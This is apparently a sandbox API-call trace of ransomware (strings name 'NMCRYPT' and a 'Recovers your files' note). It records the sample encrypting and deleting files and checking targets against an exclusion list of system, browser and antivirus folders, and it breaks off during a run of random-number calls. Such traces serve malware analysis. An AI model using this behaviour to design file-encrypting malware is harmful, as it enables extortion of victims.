0x0 [0149.404] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.404] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.405] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.405] GetLastError () returned 0x0 [0149.405] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.406] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 1 [0149.406] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi")) returned 0 [0149.406] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi" [0149.406] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US") returned 1 [0149.406] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXBA9C.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxba9c.tmp")) returned 0xba9c [0149.406] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXBA9C.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxba9c.tmp"), dwFlags=0x1) returned 0 [0149.407] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXBA9C.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxba9c.tmp")) returned 1 [0149.407] CryptDestroyKey (hKey=0x9ad7f8) returned 1 [0149.407] wcslen (_String="OK") returned 0x2 [0149.407] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0149.407] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0149.407] CryptDestroyKey (hKey=0x9ad3b8) returned 1 [0149.407] CryptDestroyHash (hHash=0x9ad138) returned 1 [0149.407] CryptReleaseContext (hProv=0x8e3880, dwFlags=0x0) returned 1 [0149.407] PathMatchSpecW (pszFile="correct.avi", pszSpec="*NMCRYPT") returned 0 [0149.407] PathMatchSpecW (pszFile="correct.avi", pszSpec="*Recovers your files.html") returned 0 [0149.407] PathMatchSpecW (pszFile="correct.avi", pszSpec="*.exe") returned 0 [0149.407] PathMatchSpecW (pszFile="correct.avi", pszSpec="*.dll") returned 0 [0149.407] PathMatchSpecW (pszFile="correct.avi", pszSpec="*.lnk") returned 0 [0149.407] PathMatchSpecW (pszFile="correct.avi", pszSpec="*.bat") returned 0 [0149.407] PathMatchSpecW (pszFile="correct.avi", pszSpec="*.ini") returned 0 [0149.407] PathMatchSpecW (pszFile="correct.avi", pszSpec="*.msi") returned 0 [0149.407] PathMatchSpecW (pszFile="correct.avi", pszSpec="*.scf") returned 0 [0149.407] PathMatchSpecW (pszFile="correct.avi", pszSpec="*pagefile.sys*") returned 0 [0149.407] PathMatchSpecW (pszFile="correct.avi", pszSpec="*NTUSER.DAT*") returned 0 [0149.407] PathMatchSpecW (pszFile="correct.avi", pszSpec="*AppData*") returned 0 [0149.407] PathMatchSpecW (pszFile="correct.avi", pszSpec="*\\winrar\\*") returned 0 [0149.407] PathMatchSpecW (pszFile="correct.avi", pszSpec="*\\Internet Explorer\\*") returned 0 [0149.407] PathMatchSpecW (pszFile="correct.avi", pszSpec="*\\java\\*") returned 0 [0149.407] PathMatchSpecW (pszFile="correct.avi", pszSpec="*\\TeamViewer\\*") returned 0 [0149.407] PathMatchSpecW (pszFile="correct.avi", pszSpec="*\\windows\\*") returned 0 [0149.407] PathMatchSpecW (pszFile="correct.avi", pszSpec="*\\ESET\\*") returned 0 [0149.408] PathMatchSpecW (pszFile="correct.avi", pszSpec="*\\AVG\\*") returned 0 [0149.408] PathMatchSpecW (pszFile="correct.avi", pszSpec="*\\AVIRA\\*") returned 0 [0149.408] PathMatchSpecW (pszFile="correct.avi", pszSpec="*\\AVAST Software\\*") returned 0 [0149.408] PathMatchSpecW (pszFile="correct.avi", pszSpec="*Atheros*") returned 0 [0149.408] PathMatchSpecW (pszFile="correct.avi", pszSpec="*Realtek*") returned 0 [0149.408] PathMatchSpecW (pszFile="correct.avi", pszSpec="*bootmgr*") returned 0 [0149.408] PathMatchSpecW (pszFile="correct.avi", pszSpec="*boot*") returned 0 [0149.408] PathMatchSpecW (pszFile="correct.avi", pszSpec="*boot*") returned 0 [0149.408] PathMatchSpecW (pszFile="correct.avi", pszSpec="*CONFIG.SYS*") returned 0 [0149.408] PathMatchSpecW (pszFile="correct.avi", pszSpec="*IO.SYS*") returned 0 [0149.408] PathMatchSpecW (pszFile="correct.avi", pszSpec="*MSDOS.SYS*") returned 0 [0149.408] PathMatchSpecW (pszFile="correct.avi", pszSpec="*NTDETECT.COM*") returned 0 [0149.408] PathMatchSpecW (pszFile="correct.avi", pszSpec="*ntldr*") returned 0 [0149.408] PathMatchSpecW (pszFile="correct.avi", pszSpec="*chrome*") returned 0 [0149.408] PathMatchSpecW (pszFile="correct.avi", pszSpec="*opera*") returned 0 [0149.408] PathMatchSpecW (pszFile="correct.avi", pszSpec="*firefox*") returned 0 [0149.408] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi", pszSpec="*") returned 1 [0149.408] strlen (_Str="NMoreira") returned 0x8 [0149.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.408] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.411] CryptGenRandom (in: hProv=0x8bf310, 